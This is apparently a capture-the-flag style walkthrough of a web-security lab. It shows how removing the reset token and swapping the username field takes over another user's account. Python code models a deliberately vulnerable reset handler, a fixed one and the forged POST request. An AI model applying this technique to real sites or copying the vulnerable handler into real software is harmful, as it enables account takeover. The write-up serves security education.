Daemon Of Hacking
Password reset broken logic


Last updated 6 months ago

Lab description

Walkthrough

Step 1: Understand the Password Reset Functionality

Begin by navigating to the login page and selecting the "Forgot password?" link. The application prompts for a username rather than an email address, which already tells you that the username is the identifier the reset flow keys on. Start by testing the process with your own account: enter wiener and click Submit.

Step 2: Inspect the Email Reset Link

After submitting your username, an email is sent to your associated email account. This email contains a reset link, which directs you to a page prompting you to enter a new password twice.

Step 3: Analyze the Reset Password Request

Submit a new password, and intercept the request using Burp Suite. Carefully inspect the request payload. You will notice:

  • The temp-forgot-password-token appears twice: as a query parameter in the request line (the POST URL) and as a field in the request body.

  • A username parameter specifies which account's password is being reset. That is the suspicious part: the token was issued for one account, so the server should derive the username from the token rather than trust a value the client sends.

Step 4: Exploit Logic Flaw

After analyzing the request, remove the temp-forgot-password-token from both the request line and the body, then resubmit. The server responds exactly as it did for the original request, so the token is never validated and the only thing that decides which account is modified is the username parameter. To confirm this from your own session, log out and log back in as wiener with the password you just set.

Step 5: Reset Carlos's Password

Requesting a reset for Carlos on the "Forgot password?" page is not actually required: since the token isn't checked, the request captured from your own reset is all you need.

  • Intercept (or send to Repeater) the reset request for your own account (wiener), remove the token, and change the username field to carlos. Set new-password-1 and new-password-2 to the password you want Carlos to have (e.g., KruKnight).

  • Send the modified request.
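To make the logic flaw in Steps 3 to 5 concrete, here is an added example (my own code, not the lab's or PortSwigger's source) that models the reset endpoint twice: a vulnerable handler that trusts the client-supplied username and never consults the token, and a hardened one that binds the account to a single-use token issued by the server. It also renders the forged POST the way it would look in Repeater. The initial passwords, the /forgot-password path and the host name are assumptions made for the demonstration; only wiener, carlos and the parameter names come from the lab.

```python
"""Model of the broken password-reset logic (added example, not the lab's code)."""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class ResetStore:
    """Constructed in-memory user store; the starting passwords are placeholders."""
    passwords: dict = field(
        default_factory=lambda: {"wiener": "peter", "carlos": "unknown-to-attacker"}
    )
    tokens: dict = field(default_factory=dict)  # token -> username it was issued for

    def issue_token(self, username):
        """What the 'Forgot password?' form does: mint a token bound to one account."""
        if username not in self.passwords:
            return None  # no hint about whether the account exists
        token = secrets.token_hex(16)
        self.tokens[token] = username
        return token


def reset_vulnerable(store, form):
    """Mirrors the lab: the username field picks the account; the token is ignored."""
    if form.get("new-password-1") != form.get("new-password-2"):
        return False
    username = form.get("username")
    if username not in store.passwords:
        return False
    store.passwords[username] = form["new-password-1"]
    return True


def reset_fixed(store, form):
    """Hardened: the token decides the account, is single-use, and must be present."""
    if form.get("new-password-1") != form.get("new-password-2"):
        return False
    token = form.get("temp-forgot-password-token")
    if not token:
        return False
    owner = store.tokens.pop(token, None)  # consume it even if the rest fails
    if owner is None:
        return False
    # A username in the form is allowed only if it agrees with the token's owner.
    supplied = form.get("username")
    if supplied is not None and not hmac.compare_digest(supplied, owner):
        return False
    store.passwords[owner] = form["new-password-1"]
    return True


def forge_reset_request(host, username, new_password):
    """Raw HTTP text of the Step 5 request: token removed, username swapped."""
    body = (
        f"username={username}&new-password-1={new_password}"
        f"&new-password-2={new_password}"
    )
    return (
        "POST /forgot-password HTTP/1.1\r\n"  # path is an assumption
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


def demo():
    """Run the forged request against both handlers and report what changed."""
    attack = {
        "username": "carlos",
        "new-password-1": "KruKnight",
        "new-password-2": "KruKnight",
    }
    vulnerable = ResetStore()
    vulnerable.issue_token("wiener")  # attacker starts a reset for their own account
    hardened = ResetStore()
    hardened.issue_token("wiener")
    return {
        "vulnerable_accepted": reset_vulnerable(vulnerable, attack),
        "vulnerable_carlos_pw": vulnerable.passwords["carlos"],
        "fixed_accepted": reset_fixed(hardened, attack),
        "fixed_carlos_pw": hardened.passwords["carlos"],
    }


if __name__ == "__main__":
    print(forge_reset_request("YOUR-LAB-ID.web-security-academy.net", "carlos", "KruKnight"))
    print(demo())
```

The fix is not "check that a token is present": it is that the token, not the form, identifies the account, and that the token is consumed on first use so a replayed or leaked request cannot be used again.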

Step 6: Verify Access to Carlos’s Account

Navigate to the login page and log in with the username carlos and the password you just set. A successful login confirms that the reset went through for an account you never held a token for, which is the logic flaw the lab is about.